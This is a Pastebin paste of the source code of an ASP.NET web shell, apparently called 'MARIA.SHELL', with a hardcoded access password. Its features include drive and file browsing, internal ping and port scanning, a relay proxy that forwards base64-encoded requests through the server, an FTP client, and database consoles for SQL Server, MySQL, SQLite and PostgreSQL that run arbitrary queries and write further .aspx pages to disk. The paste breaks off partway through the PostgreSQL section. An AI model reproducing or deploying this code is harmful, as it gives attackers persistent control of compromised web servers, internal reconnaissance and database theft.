API tools faq
paste
Guest User

Untitled

a guest
Apr 20th, 2018
137
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 61.85 KB | None | 0 0
raw download clone embed print report
  1. <%@ Page Language="C#" EnableViewState="false" %>
  2. <%@ Import Namespace="System.Net.NetworkInformation" %>
  3. <%@ Import Namespace="System.Web.UI.WebControls" %>
  4. <%@ Import Namespace="System.Data.SqlClient" %>
  5. <%@ Import Namespace="System.Net.Sockets" %>
  6. <%@ Import Namespace="System.Diagnostics" %>
  7. <%@ Import Namespace="System.Net" %>
  8. <%@ Import Namespace="System.IO" %>
  9.  
  10.  
  11. <%
  12.  
  13. // Password Shell //////////////////////////////////////////////////////////////////////////////////////
  14. String PASSWORG_SHELL = "lulz4u";
  15. ////////////////////////////////////////////////////////////////////////////////////////////////////////
  16.  
  17. // Variables
  18. string MARIA = Path.GetFileName(Request.Path);
  19. string MainDrive = Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
  20. string Output = "";String Folders = "";
  21. String Files = ""; String Binaries = ""; String PORTSCAN = "";
  22. String ResultSearchOuput = "<h1>Result Found</h1>"; String OutputFTPBuffer = ""; String querys = "";
  23. String OutputFTPStatus="";String DirFTP="";String attributesOfFiles="";String SQLView="";String PINGSCAN="";
  24.  
  25. // List Storages
  26. string CurrentFolder = Page.MapPath(".") + "/";
  27. if (!string.IsNullOrEmpty(Request.QueryString["Directory"]))
  28. CurrentFolder = Request.QueryString["Directory"] + "/";
  29. CurrentFolder = CurrentFolder.Replace("\\", "/");
  30. CurrentFolder = CurrentFolder.Replace("//", "/");
  31. foreach(DriveInfo curdrive in DriveInfo.GetDrives())
  32. {
  33. if (!curdrive.IsReady)
  34. continue;
  35. string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
  36. Output += string.Format("<a href='?Directory={0}' title='{2} Bytes Free'><input type='button' value='{1}'></a>&nbsp;", HttpUtility.UrlEncode(driveRoot), HttpUtility.HtmlEncode(driveRoot), curdrive.TotalFreeSpace);
  37. }
  38.  
  39. // PING Scan
  40. if(!string.IsNullOrEmpty(Request.Form["Range"])){
  41. Ping pinger = new Ping();
  42. int TIMEOUT = Convert.ToInt32(Request.Form["Timeout"]);
  43. PINGSCAN += "<table class='tabla'> <tr> <th scope='col'>IP</th> <th scope='col'>Status</th> </tr>";
  44.  
  45. string[] IPRange = Request.Form["Range"].Split('.');
  46. for(int index=0;index != 255;index++){
  47. try {
  48. PingReply reply = pinger.Send(IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index,TIMEOUT);
  49. bool pingable = false;
  50. pingable = reply.Status == IPStatus.Success;
  51. if (pingable == true)
  52. {
  53. PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td><font color='green'>LIVE</font></td></tr>";
  54. }else{
  55. PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td>DOWN</td></tr>";
  56. }
  57. }
  58. catch (PingException)
  59. {
  60. PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td>DOWN</td></tr>";
  61. }
  62. }
  63. PINGSCAN += "</table><script>DivShowAndHidden('PSCAN');</script>";
  64. }
  65.  
  66. // PORT Scan
  67. if(!string.IsNullOrEmpty(Request.Form["IPSCAN"])){
  68. string[] port = Request.Form["Ports"].Split(',');
  69. PORTSCAN += "<table class='tabla'> <tr> <th scope='col'>Port</th> <th scope='col'>Status</th> </tr>";
  70. TcpClient socket = new TcpClient();
  71. IPAddress address = IPAddress.Parse(Request.Form["IPSCAN"]);
  72. socket.SendTimeout = 3000;
  73. socket.ReceiveTimeout = 3000;
  74. for(int indexb=0;indexb != port.Length;indexb++){
  75. try{
  76. socket.Connect(address, Convert.ToInt32(port[indexb]));
  77. if(socket.Connected){
  78. PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td><font color='green'>LIVE</font></td></tr>";
  79. }else{
  80. PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td>DOWN</td></tr>";
  81. }
  82. }catch(Exception e){
  83. PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td>DOWN</td></tr>";
  84. }
  85. }
  86. PORTSCAN += "<script>DivShowAndHidden('PORTSCAN');</script>";
  87. }
  88.  
  89. // PROXY
  90. if(!string.IsNullOrEmpty(Request.QueryString["REQUEST"])){
  91.  
  92. TcpClient socket = new TcpClient();
  93. IPAddress address = IPAddress.Parse(Request.QueryString["Host"]);
  94. socket.SendTimeout = 10000;
  95. socket.ReceiveTimeout = 10000;
  96.  
  97. socket.Connect(address, Convert.ToInt32(Request.QueryString["Port"]));
  98.  
  99. if(socket.Connected){
  100.  
  101. NetworkStream networkStream;
  102. StreamWriter streamWriter;
  103. StreamReader streamReader;
  104.  
  105. networkStream = socket.GetStream();
  106. streamReader = new StreamReader(networkStream);
  107. streamWriter = new StreamWriter(networkStream);
  108.  
  109. byte[] data = Convert.FromBase64String(Request.QueryString["REQUEST"]);
  110. streamWriter.Write(Encoding.UTF8.GetString(data));
  111. streamWriter.Flush();
  112.  
  113. byte[] buffer = new byte[32768];
  114. int read = 0;
  115.  
  116. int chunk;
  117. while ((chunk = networkStream.Read(buffer, read, buffer.Length - read)) > 0) {
  118. read += chunk;
  119. if (read != buffer.Length) { continue; }
  120. int nextByte = networkStream.ReadByte();
  121. if (nextByte == -1) { break; }
  122.  
  123. byte[] newBuffer = new byte[buffer.Length * 2];
  124. Array.Copy(buffer, newBuffer, buffer.Length);
  125. newBuffer[read] = (byte)nextByte;
  126. buffer = newBuffer;
  127. read++;
  128. }
  129.  
  130. byte[] ret = new byte[read];
  131. Array.Copy(buffer, ret, read);
  132. Response.OutputStream.Write(ret, 0, ret.Length);
  133. Response.End();
  134. }
  135. }
  136.  
  137. // FTP Client
  138. if(!string.IsNullOrEmpty(Request.Form["FTP"])){
  139. try{
  140. // List Files in FTP Server
  141. DirFTP=Request.Form["command"];
  142. if(!string.IsNullOrEmpty(Request.Form["FolderCurrent"]) & !string.IsNullOrEmpty(DirFTP)){
  143. DirFTP=Request.Form["FolderCurrent"]+"/"+DirFTP;}
  144.  
  145. if(Request.Files["filetoFTP"]==null | Request.Form["action"]=="cd"){
  146. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  147. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  148. request.Method = WebRequestMethods.Ftp.ListDirectoryDetails;
  149. FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  150. Stream responseStream = response.GetResponseStream();
  151. StreamReader reader = new StreamReader(responseStream);
  152. OutputFTPBuffer="<table class='tabla'><tr><th scope='col'>Output</th></tr>";
  153. while (!reader.EndOfStream) {OutputFTPBuffer+="<tr><td>"+reader.ReadLine()+"</td></tr>";}
  154. OutputFTPStatus="</table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST' enctype='multipart/form-data' ><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='download'>Download</option><option value='DeleteFileFTP'>Delete File</option><option value='DeleteFileFolder'>Delete Folder</option><option value='cd'>Change Directory</option><option value='newDir'>New Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='file' name='filetoFTP'> <input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+"</i></b></form>";
  155. reader.Close();
  156. response.Close();}
  157.  
  158. // Download File to FTP Server
  159. if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="download"){
  160. int bytesRead = 0;
  161. byte[] buffer = new byte[2048];
  162. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  163. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  164. request.Method = WebRequestMethods.Ftp.DownloadFile;
  165. Stream reader = request.GetResponse().GetResponseStream();
  166. FileStream fileStream = new FileStream(@CurrentFolder+Request.Form["command"], FileMode.Create);
  167. while (true){bytesRead = reader.Read(buffer, 0, buffer.Length);if (bytesRead == 0){break;}fileStream.Write(buffer, 0, bytesRead);}fileStream.Close();
  168. OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status, Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";}
  169.  
  170. // Make Folder to FTP Server
  171. if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="newDir"){
  172. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  173. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  174. request.Method = WebRequestMethods.Ftp.MakeDirectory;
  175. FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  176. Stream responseStream = response.GetResponseStream();
  177. StreamReader reader = new StreamReader(responseStream);
  178. OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";}
  179.  
  180. // Upload File to FTP Server
  181. if(Request.Files["filetoFTP"]!=null){}
  182.  
  183. // Delete File of FTP Server
  184. if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="DeleteFileFTP"){
  185. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  186. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  187. request.Method = WebRequestMethods.Ftp.DeleteFile;
  188. FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  189. OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";
  190. response.Close();}
  191.  
  192. // Delete Folders of FTP Server
  193. if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="DeleteFileFolder"){
  194. FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
  195. request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
  196. request.Method = WebRequestMethods.Ftp.RemoveDirectory;
  197. FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  198. OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";
  199. response.Close();}
  200.  
  201. }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
  202. }
  203.  
  204.  
  205. // SQL Clients
  206. if(!string.IsNullOrEmpty(Request.Form["SQLProtocol"]) | !string.IsNullOrEmpty(Request.QueryString["SQLProtocol"])) {
  207. // For each MySQL Services
  208. String LOCALHOST= Request.Form["host"] + Request.QueryString["host"];
  209. String PORT = Request.Form["port"] + Request.QueryString["port"];
  210. String USERNAME = Request.Form["user"] + Request.QueryString["user"];
  211. String PASSWORD = Request.Form["pass"] + Request.QueryString["pass"];
  212. String DATABASE = Request.Form["database"] + Request.QueryString["database"];
  213. String FILE = Request.Form["filename"] + Request.QueryString["filename"];
  214.  
  215. // Ms-Mysql Server
  216. if (Request.Form["SQLProtocol"] == "SQLServer" | Request.QueryString["SQLProtocol"] == "SQLServer")
  217. {
  218. try
  219. {
  220. String TypeOutput = "";
  221. System.Data.SqlClient.SqlConnection conn;
  222. string myConnectionString;
  223. myConnectionString = "Data Source=" + LOCALHOST + ";uid=" + USERNAME + ";" + "pwd=" + PASSWORD + ";Network Library=DBMSSOCN;Initial Catalog=" + DATABASE + ";";
  224. conn = new System.Data.SqlClient.SqlConnection();
  225. conn.ConnectionString = myConnectionString;
  226. conn.Open();
  227.  
  228. String Action = Request.QueryString["Action"];
  229. Action += Request.Form["Action"];
  230. if (Action == "SelectTable")
  231. {
  232. querys = "SELECT * FROM " + Request.QueryString["Value"] + "";
  233. TypeOutput = "columns";
  234. }
  235. else if (Action == "ListTables")
  236. {
  237. querys = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'";
  238. TypeOutput = "Tables";
  239. }
  240. else if (!string.IsNullOrEmpty(Request.Form["queryString"]))
  241. {
  242. querys = Request.Form["queryString"];
  243. TypeOutput = "Query";
  244. }
  245. else
  246. {
  247. querys = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'";
  248. TypeOutput = "Tables";
  249. }
  250. System.Data.SqlClient.SqlCommand mycomand = new System.Data.SqlClient.SqlCommand(querys, conn);
  251. System.Data.SqlClient.SqlDataReader myreader = mycomand.ExecuteReader();
  252. if (TypeOutput != "Query")
  253. {
  254. int CounterColumn = myreader.FieldCount;
  255. SQLView += "<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>";
  256. for (int i = 0; i < CounterColumn; i++)
  257. {
  258. SQLView += "<th scope='col'>" + myreader.GetName(i) + "</th>";
  259. }
  260. while (myreader.Read())
  261. {
  262. String Field = "";
  263. int dbFields = myreader.FieldCount;
  264. for (int i = 1; i < dbFields; i++)
  265. {
  266. Field += "<td>" + myreader[i] + "</td>";
  267. }
  268. if (TypeOutput == "Tables")
  269. {
  270. SQLView += "<tr><td><a href='?SQLProtocol=SQLServer&Action=SelectTable&host="+LOCALHOST+"&user="+USERNAME+"&pass="+PASSWORD+"&database="+DATABASE+"&Value=" + myreader[2] + "' title='Table'>" + myreader[2] + "</td>" + Field + "</tr>";
  271. }
  272. else
  273. {
  274. SQLView += "<tr><td>" + myreader[0] + "</td>" + Field + "</tr>";
  275. }
  276. Field = "";
  277. }
  278. }
  279. else
  280. {
  281. SQLView += "<div class='footTable'><b><h2>Output</h2></b>";
  282. while (myreader.Read())
  283. {
  284. SQLView += myreader[0].ToString();
  285. }
  286. SQLView += "</code></div>";
  287. }
  288. SQLView += "</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action=" + MARIA + "><input type=hidden name=SQLProtocol value=SQLServer><input type=hidden name=host value=" + LOCALHOST + "><input type=hidden name=database value=" + DATABASE + "><input type=hidden name=user value=" + USERNAME + "><input type=hidden name=pass value=" + PASSWORD + "><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>";
  289. }
  290. catch (Exception e)
  291. {
  292. Response.Write("<div class='alert'>"+e.Message+"</div>");
  293. }
  294. }
  295. // Mysql Client
  296. if (Request.Form["SQLProtocol"] == "MySQL" | Request.QueryString["SQLProtocol"] == "MySQL")
  297. {
  298. try
  299. {
  300. String FileCreateMYSQLa = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
  301. String FileCreateMYSQLb = @"<%";
  302. String FileCreateMYSQLc = @"String query="""";string MARIA = System.IO.Path.GetFileName(Request.Path);String SQLView="""";MySql.Data.MySqlClient.MySqlConnection conn; string myConnectionString; String LOCALHOST=Request.QueryString[""host""]+Request.Form[""host""]; String USERNAME=Request.QueryString[""user""]+Request.Form[""user""]; String PASSWORD=Request.QueryString[""pass""]+Request.Form[""pass""]; String DATABASE = Request.QueryString[""database""]+Request.Form[""database""]; myConnectionString = ""server=""+LOCALHOST+"";uid=""+USERNAME+"";"" + ""pwd=""+PASSWORD+"";database=""+DATABASE+"";""; try {conn = new MySql.Data.MySqlClient.MySqlConnection(); conn.ConnectionString = myConnectionString; conn.Open(); String TypeOutput = """"; String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {query = ""SELECT * FROM `"" + Request.QueryString[""Value""] + ""`""; } else if (Action == ""ListTables"") {query = ""SHOW FULL TABLES FROM ""+Request.Form[""database""]; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {query = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {query = ""SHOW FULL TABLES FROM ""+DATABASE; TypeOutput = ""Tables""; } MySql.Data.MySqlClient.MySqlCommand mycomand = new MySql.Data.MySqlClient.MySqlCommand(query, conn); MySql.Data.MySqlClient.MySqlDataReader myreader = mycomand.ExecuteReader(); if (TypeOutput != ""Query"") {int CounterColumn = myreader.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + myreader.GetName(i) + ""</th>""; } while (myreader.Read()) {String Field = "" ""; int dbFields = myreader.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + myreader[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=Mysql&Action=SelectTable&host=""+LOCALHOST+""&user=""+USERNAME+""&pass=""+PASSWORD+""&database=""+DATABASE+""&Value="" + myreader[0] + ""' title='Table'>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>MARIA.SHELL > MYsql Client > Output</h2></b>""; while (myreader.Read()) {SQLView += myreader.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=SQLProtocol value=Mysql><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>""; } catch (Exception e) {Response.Write(""</table><div class='alert'>SHELL.ASPX Message: "" + e.Message + ""</div>"");}Response.Write(SQLView);";
  303. String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
  304. using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
  305. System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreateMYSQLa + FileCreateMYSQLb + FileCreateMYSQLc + "%" + ">" + StyleHTML);
  306. SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=no seamless=yes src=TEMP~.aspx?host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
  307.  
  308. }
  309. catch (Exception e)
  310. {
  311. Response.Write("<div class='alert'>" + e.Message + "</div>");
  312. }
  313. }
  314. // SQLite Client
  315. if (Request.Form["SQLProtocol"] == "SQLite" | Request.QueryString["Postgresql"] == "SQLite")
  316. {
  317. try
  318. {
  319. String FileCreateSQLitea = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
  320. String FileCreateSQLiteb = @"<%";
  321. String FileCreateSQLitec = @"try{String SQLView = """"; String TypeOutput = """"; String querys = """"; string myConnectionString; String LOCALHOST = Request.Form[""host""] + Request.QueryString[""host""]; String USERNAME = Request.Form[""user""] + Request.QueryString[""user""]; String PASSWORD = Request.Form[""pass""] + Request.QueryString[""pass""]; String DATABASE = Request.Form[""database""] + Request.QueryString[""database""]; string MARIA = System.IO.Path.GetFileName(Request.Path); string FILE = Request.Form[""filename""] + Request.QueryString[""filename""]; myConnectionString = ""Data Source=""+FILE; System.Data.SQLite.SQLiteConnection conn; conn = new System.Data.SQLite.SQLiteConnection(); conn.ConnectionString = myConnectionString; conn.Open(); String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {querys = ""SELECT * FROM "" + Request.QueryString[""Value""] + """"; TypeOutput = ""columns""; } else if (Action == ""ListTables"") {querys = ""SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type IN ('table','view') ORDER BY 1""; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {querys = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {querys = ""SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type IN ('table','view') ORDER BY 1""; TypeOutput = ""Tables""; } System.Data.SQLite.SQLiteCommand mycomand = new System.Data.SQLite.SQLiteCommand(querys, conn); System.Data.SQLite.SQLiteDataReader myreader = mycomand.ExecuteReader(); if (TypeOutput != ""Query"") {int CounterColumn = myreader.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + myreader.GetName(i) + ""</th>""; } while (myreader.Read()) {String Field = """"; int dbFields = myreader.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + myreader[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=SQLite&Action=SelectTable&filename=""+FILE+""&host=""+LOCALHOST+""&user=""+USERNAME+""&pass=""+PASSWORD+""&database=""+DATABASE+""&Value="" + myreader[0] + ""' title='Table'>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>MARIA.SHELL > SQLite Client > Output</h2></b>""; while (myreader.Read()) {SQLView += myreader.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=SQLProtocol value=SQLite><input type=hidden name=filename value="" + FILE + ""><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>""; Response.Write(SQLView); } catch (Exception e) {Response.Write(""<div class='alert'>""+e.Message+""</div>""); }";
  322. String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
  323. using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
  324. System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreateSQLitea + FileCreateSQLiteb + FileCreateSQLitec + "%" + ">" + StyleHTML);
  325. SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=no seamless=yes src=TEMP~.aspx?filename="+FILE+"&host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
  326. }
  327. catch (Exception e)
  328. {
  329. Response.Write("<div class='alert'>" + e.Message + "</div>");
  330. }
  331. }
  332. // PostgreSQL Client
  333. if (Request.Form["SQLProtocol"] == "PostgreSQL" | Request.QueryString["Postgresql"] == "PostgreSQL")
  334. {
  335. try
  336. {
  337. String FileCreatePostgresSQLa = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
  338. String FileCreatePostgresSQLb = @"<%@ Import Namespace=""System"" " + "%" + ">";
  339. String FileCreatePostgresSQLc = @"<%@ Import Namespace=""System.Text"" " + "%" + ">";
  340. String FileCreatePostgresSQLd = @"<%@ Import Namespace=""Npgsql"" " + "%" + ">";
  341. String FileCreatePostgresSQLe = @"<%@ Import Namespace=""System.Data"" " + "%" + ">";
  342. String FileCreatePostgresSQLf = @"<%";
  343. String FileCreatePostgresSQLg = @"string TypeOutput = """"; string SQLView = """"; string querys = """"; String LOCALHOST = Request.Form[""host""] + Request.QueryString[""host""]; String USERNAME = Request.Form[""user""] + Request.QueryString[""user""]; String PASSWORD = Request.Form[""pass""] + Request.QueryString[""pass""]; String DATABASE = Request.Form[""database""] + Request.QueryString[""database""]; string MARIA = System.IO.Path.GetFileName(Request.Path); string conStr = ""Server=""+LOCALHOST+""; User Id=""+USERNAME+""; Password=""+PASSWORD+""; Database=""+DATABASE+"";""; NpgsqlConnection conn = new NpgsqlConnection(conStr); String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {querys = ""SELECT * FROM "" + Request.QueryString[""Value""] + """"; TypeOutput = ""columns""; } else if (Action == ""ListTables"") {querys = ""SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'""; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {querys = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {querys = ""SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'""; TypeOutput = ""Tables""; } NpgsqlCommand com = new NpgsqlCommand(querys, conn); NpgsqlDataAdapter ad = new NpgsqlDataAdapter(com); DataTable dt = new DataTable(); if(conn != null && conn.State == ConnectionState.Open) {conn.Close(); } else {conn.Open(); } ad.Fill(dt); NpgsqlDataReader dRead = com.ExecuteReader(); try {if (TypeOutput != ""Query"") {int CounterColumn = dRead.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + dRead.GetName(i) + ""</th>""; } while (dRead.Read()) {String Field = """"; int dbFields = dRead.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + dRead[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=PostgreSQL&Action=SelectTable&host="" + LOCALHOST + ""&user="" + USERNAME + ""&pass="" + PASSWORD + ""&database="" + DATABASE + ""&Value="" + dRead[2] + ""' title='Table'>"" + dRead[2] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + dRead[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>Output</h2></b>""; while (dRead.Read()) {SQLView += dRead.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=PostgreSQL value=SQLite><input type=hidden name=host value="" + 